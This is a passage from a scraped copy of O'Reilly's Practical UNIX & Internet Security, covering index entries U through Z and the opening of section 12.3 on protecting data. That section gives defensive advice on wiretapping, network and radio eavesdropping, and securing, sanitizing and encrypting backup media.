tainting : 18.2.3.4. Tainting with Perl<br />

training : 13.2.1. Initial Training<br />

UIDs : (see UIDs)<br />

unattended terminals<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

USERFILE entries for : 15.4.1.2. USERFILE entries for local users<br />

www : 18.2.2. Understand Your Server's Directory Structure<br />

users command<br />

10.1.2. utmp and wtmp Files<br />

24.2.1. Catching One in the Act<br />

USG (<strong>UNIX</strong> Support Group) : 1.3. History of <strong>UNIX</strong><br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (5 of 8) [2002-04-12 10:44:01]


Index<br />

/usr directory<br />

4.3.7. The Bad su Log<br />

(see also /var directory)<br />

backing up /usr/bin : 7.1.2. What Should You Back Up?<br />

/usr/adm directory : 11.5.3.6. Other files<br />

/usr/adm/lastlog file : 10.1.1. lastlog File<br />

/usr/adm/messages file : 10.2.3. messages Log File<br />

/usr/bin directory<br />

11.1.5. Viruses<br />

11.5.1.1. PATH attacks<br />

/usr/bin/uudecode : (see uudecode program)<br />

/usr/etc/yp/makedbm program : 19.4.4.1. Setting up netgroups<br />

/usr/lib/aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or<br />

aliases.pag<br />

/usr/lib directory : 11.5.3.6. Other files<br />

in restricted filesystems : 8.1.5. Restricted Filesystem<br />

/usr/lib/preserve program : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

/usr/lib/sendmail : (see sendmail)<br />

/usr/lib/uucp/Devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

/usr/lib/uucp directory<br />

15.4.2.1. Some bad examples<br />

15.5.2. Permissions Commands<br />

/usr/lib/uucp/L-devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

/usr/lib/uucp/L.cmds file : (see L.cmds file)<br />

/usr/lib/uucp/L.sys file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

/usr/lib/uucp/Permissions file : (see Permissions file)<br />

/usr/lib/uucp/Systems file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

/usr/lib/uucp/USERFILE file<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

/usr/local/bin : 1.1. What Is Computer <strong>Sec</strong>urity?<br />

/usr/local/bin directory : 11.5.1.1. PATH attacks<br />

/usr/local/etc/http/logs directory : 10.3.5. access_log Log File<br />

/usr/local/lib directory : 11.5.3.6. Other files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (6 of 8) [2002-04-12 10:44:01]


Index<br />

/usr/sbin/rexecd : (see rexec service)<br />

/usr/spool/cron/crontabs directory : 15.6.2. Automatic Execution of Cleanup Scripts<br />

/usr/spool/uucp directory : 15.1.4. How the UUCP Commands Work<br />

/usr/spool/uucppublic : (see uucppublic directory)<br />

/usr/ucb directory : 11.1.5. Viruses<br />

utility programs : 1.2. What Is an Operating System?<br />

utimes commandn : 24.5.1. Never Trust Anything Except Hardcopy<br />

utmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

uucheck program : 15.5.3. uucheck: Checking Your Permissions File<br />

uucico program<br />

15.1.4. How the UUCP Commands Work<br />

15.3. UUCP and <strong>Sec</strong>urity<br />

15.5.1.1. Starting up<br />

uucp (user)<br />

4.1. Users and Groups<br />

4.2.2. Other Special Users<br />

uucp command : 15.1.1. uucp Command<br />

UUCP system<br />

4.1.2. Multiple Accounts with the Same UID<br />

14.5. Modems and <strong>UNIX</strong><br />

15. UUCP<br />

15.9. Summary<br />

additional logins : 15.3.1. Assigning Additional UUCP Logins<br />

BNU<br />

15.2. Versions of UUCP<br />

15.5. <strong>Sec</strong>urity in BNU UUCP<br />

15.5.3. uucheck: Checking Your Permissions File<br />

checklist for : A.1.1.14. Chapter 15: UUCP<br />

cleanup scripts<br />

11.5.3. Abusing Automatic Mechanisms<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (7 of 8) [2002-04-12 10:44:01]


Index<br />

15.6.2. Automatic Execution of Cleanup Scripts<br />

early security problems : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

HoneyDanBer (HDB) : 15.2. Versions of UUCP<br />

logging : 10.3.4. uucp Log Files<br />

mail forwarding : 15.6.1. Mail Forwarding for UUCP<br />

naming computer : 15.5.2. Permissions Commands<br />

over networks : 15.8. UUCP Over Networks<br />

NFS server and : 15.3. UUCP and <strong>Sec</strong>urity<br />

passwords for : 15.3.2. Establishing UUCP Passwords<br />

Taylor : 15.2. Versions of UUCP<br />

over TCP : 17.3.20. UUCP over TCP (TCP Port 540)<br />

Version 2<br />

15.2. Versions of UUCP<br />

15.4. <strong>Sec</strong>urity in Version 2 UUCP<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

uucpa account : 15.3.1. Assigning Additional UUCP Logins<br />

uucpd program : 15.8. UUCP Over Networks<br />

uucppublic directory<br />

15.1.1. uucp Command<br />

15.4.1.3. Format of USERFILE entry without system name<br />

15.5.2. Permissions Commands<br />

uudecode program : 17.3.4.2. Using sendmail to receive email<br />

uuencode program : 6.6.1.2. Ways of improving the security of crypt<br />

uux command : 15.1.2. uux Command<br />

- (hyphen) option : 15.1.2. uux Command<br />

-r option : 15.1.4. How the UUCP Commands Work<br />

uuxqt program : 15.4.1.3. Format of USERFILE entry without system name<br />

uuxqtcmds files : 15.4.3. L.cmds: Providing Remote Command Execution<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (8 of 8) [2002-04-12 10:44:01]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: V<br />

vacuums, computer : 12.2.1.3. Dust<br />

VALIDATE= command : 15.5.2. Permissions Commands<br />

vampire taps : 12.3.1.5. Fiber optic cable<br />

vandalism<br />

7.1.1.1. A taxonomy of computer failures<br />

12.2.4. Vandalism<br />

12.2.4.3. Network connectors<br />

/var directory<br />

4.3.7. The Bad su Log<br />

9.1.2. Read-only Filesystems<br />

(see also /usr directory)<br />

/var/adm/acct : 10.2. The acct/pacct Process Accounting File<br />

/var/adm directory : 11.5.3.6. Other files<br />

/var/adm/lastlog file : 10.1.1. lastlog File<br />

/var/adm/loginlog file : 10.1.4. loginlog File<br />

/var/adm/messages : 10.2.3. messages Log File<br />

/var/adm/messages file : 4.3.7. The Bad su Log<br />

/var/adm/savacct : 10.2. The acct/pacct Process Accounting File<br />

/var/adm/sulog file : 4.3.7. The Bad su Log<br />

/var/adm/wtmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.3.1. Pruning the wtmp file<br />

/var/adm/xferlog : 10.3.3. xferlog Log File<br />

/var/log directory : 11.5.3.6. Other files<br />

/var/spool/uucp/.Admin directory : 10.3.4. uucp Log Files<br />

variables<br />

bounds checking : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_v.htm (1 of 3) [2002-04-12 10:44:01]


Index<br />

to CGI scripts : 18.2.3.1. Do not trust the user's browser!<br />

vendor liability : 18.5.2. Trusting Your Software Vendor<br />

vendors : 27.3.3. Your Vendor?<br />

ventilation<br />

12.2.1.10. Vibration<br />

(see also dust; smoke and smoking)<br />

air ducts : 12.2.3.2. Entrance through air ducts<br />

holes (in hardware) : 12.2.4.1. Ventilation holes<br />

VERB command (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

verifying<br />

backups : 12.3.2.1. Verify your backups<br />

new passwords : 3.5. Verifying Your New Password<br />

signatures with PGP : 6.6.3.5. Decrypting messages and verifying signatures<br />

Verisign Inc. : 18.6. Dependence on Third Parties<br />

Version 2 UUCP<br />

15.2. Versions of UUCP<br />

15.4. <strong>Sec</strong>urity in Version 2 UUCP<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

callback feature : 15.4.1.5. Requiring callback<br />

Veteran's Health Administration : F.3.4.45. U.S. Veteran's Health Administration<br />

vi editor<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

vibration : 12.2.1.10. Vibration<br />

video tape : 7.1.4. Guarding Against Media Failure<br />

vipw command : 8.4.1. Changing an Account's Password<br />

virtual terminals : (see Telnet utility)<br />

Virual Private Network : 21.1.2. Uses of Firewalls<br />

viruses<br />

11.1. Programmed Threats: Definitions<br />

11.1.5. Viruses<br />

27.2.2. Viruses on the Distribution Disk<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_v.htm (2 of 3) [2002-04-12 10:44:01]


Index<br />

bacteria programs : 11.1.7. Bacteria and Rabbits<br />

references on : D.1.4. Computer Viruses and Programmed Threats<br />

voltage spikes : 12.2.1.8. Electrical noise<br />

VPN : 21.1.2. Uses of Firewalls<br />

VRFY option (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

vsprintf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

VT100 terminal : 27.2.1. Hardware Bugs<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_v.htm (3 of 3) [2002-04-12 10:44:01]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: W<br />

w command<br />

10.1.2. utmp and wtmp Files<br />

17.3.1. systat (TCP Port 11)<br />

24.2.1. Catching One in the Act<br />

-Wall option (in C) : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

WANs (Wide Area Networks) : 16.1. Networking<br />

war : 12.2.5. Defending Against Acts of War and Terrorism<br />

warrants<br />

26.2.4. Hazards of Criminal Prosecution<br />

26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

water : 12.2.1.12. Water<br />

humidity : 12.2.1.11. Humidity<br />

sprinkler systems : 12.2.1.1. Fire<br />

stopping fires with : 12.2.1.1. Fire<br />

web browsers<br />

18.5. Risks of Web Browsers<br />

18.5.2. Trusting Your Software Vendor<br />

Netscape Navigator : 18.4.1. Eavesdropping Over the Wire<br />

Web documents : (see HTML documents)<br />

Web servers<br />

access to files on<br />

18.3. Controlling Access to Files on Your Server<br />

18.3.3. Setting Up Web Users and Passwords<br />

log files : 18.4.2. Eavesdropping Through Log Files<br />

on Macintosh : 18.2. Running a <strong>Sec</strong>ure Server<br />

web servers<br />

18.2. Running a <strong>Sec</strong>ure Server<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_w.htm (1 of 4) [2002-04-12 10:44:04]


Index<br />

18.2.5. Other Issues<br />

authentication users : 18.3.3. Setting Up Web Users and Passwords<br />

.htaccess file bug : 18.3.1. The access.conf and .htaccess Files<br />

multiple suppliers of : 18.6. Dependence on Third Parties<br />

as superuser : 18.2.1. The Server's UID<br />

symbolic-link following : 18.2.2.2. Additional configuration issues<br />

Weiner, Michael : 6.4.4.3. DES strength<br />

Westinghouse : F.3.4.46. Westinghouse Electric Corporation<br />

wheel group<br />

4.1.3.1. The /etc/group file<br />

4.3.6. Restricting su<br />

8.5.2. The wheel Group<br />

who command<br />

8.1.3. Accounts That Run a Single Command<br />

10.1.2. utmp and wtmp Files<br />

17.3.1. systat (TCP Port 11)<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

whodo command<br />

10.1.2. utmp and wtmp Files<br />

24.2.1. Catching One in the Act<br />

whois command : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

Wide Area Networks (WANs) : 16.1. Networking<br />

window, time : (see time)<br />

windows (glass) : 12.2.3.3. Glass walls<br />

windows servers : (see NSWS; X Window System)<br />

wireless transmission : (see radio, transmissions)<br />

wiretaps : (see eavesdropping)<br />

wiz command : 17.3.4.2. Using sendmail to receive email<br />

wizard's password (sendmail) : 17.3.4.1. sendmail and security<br />

WN server : 18.3. Controlling Access to Files on Your Server<br />

workstations, backing up : 7.2.1. Individual Workstation<br />

World Wide Web (WWW)<br />

18. WWW <strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_w.htm (2 of 4) [2002-04-12 10:44:04]


Index<br />

18.7. Summary<br />

browsers : (see web browsers)<br />

checklist for : A.1.1.17. Chapter 18: WWW <strong>Sec</strong>urity<br />

documents on : (see HTML documents)<br />

eavesdropping on<br />

18.4. Avoiding the Risks of Eavesdropping<br />

18.4.2. Eavesdropping Through Log Files<br />

encrypting information on : 18.4.1. Eavesdropping Over the Wire<br />

HTTP : (see HTTP)<br />

logging dowloaded files : 10.3.5. access_log Log File<br />

posting breakins on : 24.6. Resuming Operation<br />

references on : E.3. WWW Pages<br />

security mailing list : E.1.3.10. WWW-security<br />

servers : (see Web servers)<br />

trademarks and copyrights<br />

26.4.2. Copyright Infringement<br />

26.4.3. Trademark Violations<br />

viruses through : 11.1.5. Viruses<br />

world-writable files/directories : 11.6.1.1. World-writable user files and directories<br />

Worm program : 1. Introduction<br />

worms<br />

11.1. Programmed Threats: Definitions<br />

11.1.6. Worms<br />

wrappers, checklist for : A.1.1.21. Chapter 22: Wrappers and Proxies<br />

write command<br />

5.5.3.1. write: Example of a possible SUID/SGID security hole<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

in Swatch program : 10.6.2. The Swatch Configuration File<br />

time-outs on : 23.3. Tips on Writing Network Programs<br />

write permission<br />

5.1.7. File Permissions in Detail<br />

5.4. Using Directory Permissions<br />

write-protecting backups : 7.1.6.2. Write-protect your backups<br />

write-protecting filesystems : 9.1.2. Read-only Filesystems<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_w.htm (3 of 4) [2002-04-12 10:44:04]


Index<br />

WRITE= command : 15.5.2. Permissions Commands<br />

writing<br />

passwords (on paper) : 3.6.5. Writing Down Passwords<br />

programmed threats : 11.3. Authors<br />

wtmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.3.1. Pruning the wtmp file<br />

wtmpx file : 10.1.2. utmp and wtmp Files<br />

wuftpd server : 17.3.2.4. Setting up an FTP server<br />

www user/group : 18.2.2. Understand Your Server's Directory Structure<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_w.htm (4 of 4) [2002-04-12 10:44:04]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: X<br />

X Window System<br />

12.3.4.4. X terminals<br />

17.3.21. The X Window System (TCP Ports 6000-6063)<br />

17.3.21.5. Denial of service attacks under X<br />

denial of service under : 17.3.21.5. Denial of service attacks under X<br />

screen savers : 12.3.5.2. X screen savers<br />

X-rated material : 26.4.5. Pornography and Indecent Material<br />

X.500 directory service : 16.4.4. OSI<br />

X/Open Consortium : 1.3. History of <strong>UNIX</strong><br />

xargs command<br />

5.2.5.1. AIX Access Control Lists<br />

11.5.1.4. Filename attacks<br />

Xauthority facility, magic cookies : 17.3.21.4. Using Xauthority magic cookies<br />

xdm system : 17.3.21.4. Using Xauthority magic cookies<br />

XDR (external data representation) : 19.2. Sun's Remote Procedure Call (RPC)<br />

Xerox Network Systems (XNS) : 16.4.5. XNS<br />

xferlog file : 10.3.3. xferlog Log File<br />

xfrnets directive : 17.3.6.1. DNS zone transfers<br />

xhost command : 17.3.21.3. The xhost facility<br />

XOR (exclusive OR) : 6.4.7. An Unbreakable Encryption Algorithm<br />

XScreensaver program : 12.3.5.2. X screen savers<br />

XTACACS : (see TACACS)<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_x.htm [2002-04-12 10:44:04]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: Y<br />

Yellow Pages, NIS : 16.2.6.2. Other naming services<br />

ypbind daemon<br />

19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

19.4.4.5. Spoofing NIS<br />

ypcat publickey command : 19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every<br />

workstation<br />

yppasswd command<br />

3.4. Changing Your Password<br />

8.2. Monitoring File Format<br />

ypserv daemon : 19.4.4.5. Spoofing NIS<br />

ypset command : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_y.htm [2002-04-12 10:44:04]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: Z<br />

Zheng, Yliang : 6.5.4.3. HAVAL<br />

Zimmermann, Phil : 6.6.3. PGP: Pretty Good Privacy<br />

zone transfers<br />

17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

17.3.6.1. DNS zone transfers<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_z.htm [2002-04-12 10:44:05]


[Chapter 12] 12.3 Protecting Data<br />

12.3 Protecting Data<br />

Chapter 12<br />

Physical <strong>Sec</strong>urity<br />

Obviously, as described above, there is a strong overlap between physical security and data privacy and<br />

integrity. Indeed, the goal of some attacks is not the physical destruction of your computer system but the<br />

penetration and removal (or copying) of the sensitive information it contains. This section explores<br />

several different types of attacks on data and discusses approaches for protecting against these attacks.<br />

12.3.1 Eavesdropping<br />

Electronic eavesdropping is perhaps the most sinister type of data piracy. Even with modest equipment,<br />

an eavesdropper can make a complete transcript of a victim's actions - every keystroke, and every piece<br />

of information viewed on a screen or sent to a printer. The victim, meanwhile, usually knows nothing of<br />

the attacker's presence, and blithely goes about his or her work, revealing not only sensitive information,<br />

but the passwords and procedures necessary for obtaining even more.<br />

In many cases, you cannot possibly know if you're being monitored. Sometimes you will learn of an<br />

eavesdropper's presence when the attacker attempts to make use of the information obtained: often, by<br />

then, you cannot prevent significant damage. With care and vigilance, however, you can significantly<br />

decrease the risk of being monitored.<br />

12.3.1.1 Wiretapping<br />

By their very nature, electrical wires are prime candidates for eavesdropping (hence the name<br />

wiretapping). An attacker can follow an entire conversation over a pair of wires with a simple splice -<br />

sometimes he doesn't even have to touch the wires physically: a simple induction loop coiled around a<br />

terminal wire is enough to pick up most voice and RS-232 communications.<br />

Here are some guidelines for preventing wiretapping:<br />

●<br />

●<br />

●<br />

Routinely inspect all wires that carry data (especially terminal wires and telephone lines used for<br />

modems) for physical damage.<br />

Protect your wires from monitoring by using shielded cable. Armored cable provides additional<br />

protection.<br />

If you are very security conscious, place your cables in steel conduit. In high-security applications,<br />

the conduit can be pressurized with gas; gas pressure monitors can be used to trip an alarm system<br />

in the event of tampering. However, these approaches are notoriously expensive to install and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (1 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

maintain.<br />

12.3.1.2 Eavesdropping by Ethernet and 10Base-T<br />

Because Ethernet and other local area networks are susceptible to eavesdropping, unused offices should<br />

not have live Ethernet or twisted-pair ports inside them.<br />

You may wish to scan periodically all of the <strong>Internet</strong> numbers that have been allocated to your subnet to<br />

make sure that no unauthorized <strong>Internet</strong> hosts are operating on your network. You can also run LAN<br />

monitoring software and have alarms sound each time a packet is detected with a previously unknown<br />

Ethernet address.<br />

Some 10Base-T hubs can be set to monitor the IP numbers of incoming packets. If a packet comes in<br />

from a computer connected to the hub that doesn't match what the hub has been told is correct, it can<br />

raise an alarm or shut down the link. This capability helps prevent various forms of Ethernet spoofing.<br />

Increasingly, large organizations are turning to switched 10Base-T hubs. These hubs do not rebroadcast<br />

all traffic to all ports, as if they were on a shared Ethernet; instead, they determine the hardware address<br />

of each machine on each line, and only send a computer the packets that it should receive. Switching<br />

10Base-T hubs are sold as a tool for increasing the capacity of 10Base-T networks, but they also improve<br />

the security of these networks by minimizing the potential for eavesdropping.<br />

12.3.1.3 Eavesdropping by radio and using TEMPEST<br />

Every piece of electrical equipment emits radiation in the form of radio waves. Using specialized<br />

equipment, one could analyze the emitted radiation generated by computer equipment and determine the<br />

calculations that caused the radiation to be emitted in the first place.<br />

Radio eavesdropping is a special kind of tapping that security agencies (in the U.S., these agencies<br />

include the FBI, CIA, and NSA) are particularly concerned about. In the 1980s, a certification system<br />

called TEMPEST was developed in the U.S. to rate the susceptibility of computer equipment to such<br />

monitoring. Computers that are TEMPEST-certified are generally substantially less susceptible to radio<br />

monitoring than computers that are not, but they are usually more expensive and larger because of the<br />

extra shielding.<br />

As an alternative to certifying individual computers, we can now TEMPEST-certify rooms or entire<br />

buildings. Several office buildings constructed in Maryland and northern Virginia are encased in a<br />

conductive skin that dampens radio emissions coming from within.<br />

Although TEMPEST is not a concern for most computer users, the possibility of electronic<br />

eavesdropping by radio should not be discounted. Performing such eavesdropping is much easier than it<br />

would seem at first. For example, the original Heathkit H19 terminal transmitted a radio signal so strong<br />

that it could be picked up simply by placing an ordinary television set on the same table as the H19<br />

terminal. All of the characters from the terminal's screen were plainly visible on the television set's<br />

screen. In another case, information from an H19 on one floor of a house could be read on a television<br />

placed on another floor.<br />

12.3.1.4 Auxiliary ports on terminals<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (2 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

Many terminals are equipped with a printer port for use with an auxiliary printer. These printer ports can<br />

be used for eavesdropping if an attacker manages to connect a cable to them. We recommend that if you<br />

do not have an auxiliary printer, make sure that no other cables are connected to your terminal's printer<br />

port.<br />

12.3.1.5 Fiber optic cable<br />

A good type of physical protection is to use fiber optic media for a network. It is more difficult to tap into<br />

a fiber optic cable than it is to connect into an insulated coaxial cable (although an optical " vampire" tap<br />

exists that can tap a fiber optic network simply by clamping down on the cable). Successful taps often<br />

require cutting the fiber optic cable first, thus giving a clear indication that something is amiss. Fiber<br />

optic cabling is also less susceptible to signal interference and grounding. However, fiber is sometimes<br />

easier to break or damage, and more difficult to repair, than is standard coaxial cable.<br />

12.3.2 Protecting Backups<br />

Backups should be a prerequisite of any computer operation - secure or otherwise - but the information<br />

stored on backup tapes is extremely vulnerable. When the information is stored on a computer, the<br />

operating system's mechanisms of checks and protections prevents unauthorized people from viewing the<br />

data (and can possibly log failed attempts). After information is written onto a backup tape, anybody who<br />

has physical possession of the tape can read its contents.<br />

For this reason, protect your backups at least as well as you normally protect your computers themselves.<br />

Here are some guidelines for protecting your backups:<br />

●<br />

●<br />

●<br />

Don't leave backups hanging unattended in a computer room that is generally accessible.<br />

Somebody could take a backup and then have access to all of the files on your system.<br />

Don't entrust backups to a messenger who is not bonded.<br />

Sanitize backup tapes before you sell them, use them as scratch tapes, or otherwise dispose of<br />

them. (See <strong>Sec</strong>tion 12.3.2.3, "Sanitize your media before disposal" later in this chapter.)<br />

12.3.2.1 Verify your backups<br />

You should periodically verify your backups to make sure they contain valid data. (See Chapter 7,<br />

Backups, for details.)<br />

Verify backups that are months or years old in addition to backups that were made yesterday or the week<br />

before. Sometimes, backups in archives are slowly erased by environmental conditions. Magnetic tape is<br />

also susceptible to a process called print through, in which the magnetic domains on one piece of tape<br />

wound on a spool affects the next layer.<br />

The only way to find out if this process is harming your backups is to test them periodically. You can<br />

also minimize print through by spinning your tapes to the end and then rewinding them, because the tape<br />

will not line back up in the same way when the tape is rewound. We recommend that at least once a year,<br />

you check a sample of your backup tapes to make sure that they contain valid data.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (3 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

12.3.2.2 Protect your backups<br />

Many of the hazards to computers mentioned in the first part of this chapter are equally hazardous to<br />

backups. To maximize the chances of your data surviving in the event of an accident or malicious<br />

incident, keep your computer system and your backups in different locations.<br />

12.3.2.3 Sanitize your media before disposal<br />

If you throw out your tapes, or any other piece of recording media, be sure that the data on the tapes has<br />

been completely erased. This process is called sanitizing.<br />

Simply deleting a file that is on your hard disk doesn't delete the data associated with the file. Parts of the<br />

original data - and sometimes entire files - can usually be easily recovered. When you are disposing of<br />

old media, be sure to destroy the data itself, in addition to the directory entries.<br />

Modern hard disks pose a unique problem for media sanitizing because of the large amount of hidden<br />

and reserved storage. A typical 1-gigabyte hard disk may have as much as 400 megabytes of additional<br />

storage; some of this storage is used for media testing and bad-block remapping, but much of it is unused<br />

during normal operations. With special software, you can access this reserved storage area; you could<br />

even install "hard disk viruses" that can reprogram a hard disk controller, take over the computer's<br />

peripheral bus and transfer data between two devices, or feed faulty data to the host computer. For these<br />

reasons, hard disks must be sanitized with special software that is specially written for each particular<br />

disk drive's model number and revision level.<br />

If you are less security conscious, you can use a bulk eraser - a hand-held electromagnet that has a hefty<br />

field. Experiment with reading back the information stored on tapes that you have "bulk erased" until you<br />

know how much erasing is necessary to eliminate your data. But be careful: as the area of recording<br />

becomes smaller and smaller, modern hard disks are becoming remarkably resistant to external magnetic<br />

fields. Within a few years, even large, military degaussers will have no effect against high-density disk<br />

drive systems.<br />

NOTE: Do not locate your bulk eraser near your disks or good tapes! Also beware of<br />

placing the eraser in another room, on the other side of a wall from your disks or tapes.<br />

People who have pacemakers should be warned not to approach the eraser.<br />

As a last resort, you can physically destroy your backup tapes and disks before you throw them out.<br />

Unfortunately, physical destruction is getting harder and harder to do. While incinerators do a<br />

remarkably good job destroying tapes, stringent environmental regulations have forced many<br />

organizations to abandon this practice. Organizations have likewise had to give up acid baths. Until<br />

recently, crushing was preferred for hard disk drives and disk packs. But as disk densities get higher and<br />

higher, disk drives must be crushed into smaller and smaller pieces to frustrate laboratory analysis of the<br />

resulting material. As a result, physical destruction is losing in popularity when compared with<br />

software-based techniques for declassifying or sanitizing computer media.<br />

If you are a system administrator, you have an additional responsibility to sanitize your backup tapes<br />

before you dispose of them. Although you may not think that any sensitive or confidential information is<br />

stored on the tapes, your users may have been storing such information without your knowledge.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (4 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

One common sanitizing method involves overwriting the entire tape. If you are dealing with highly<br />

confidential or security-related materials, you may wish to overwrite the disk or tape several times,<br />

because data can be recovered from tapes that have been overwritten only once. Commonly, tapes are<br />

overwritten three times - once with blocks of 0s, then with blocks of 1s, and then with random numbers.<br />

Finally, the tape may be degaussed - or run through a bandsaw several times to reduce it to thousands of<br />

tiny pieces of plastic. We recommend that you thoroughly sanitize all media before disposal.<br />

12.3.2.4 Backup encryption<br />

Backup security can be substantially enhanced by encrypting the data stored on the backup tapes. Many<br />

Macintosh and PC backup packages provide for encrypting a backup set; some of these programs even<br />

use decent encryption algorithms. (Do not trust a backup system's encryption if the program's<br />

manufacturer refuses to disclose the algorithm.) Several tape drive manufacturers sell hardware that<br />

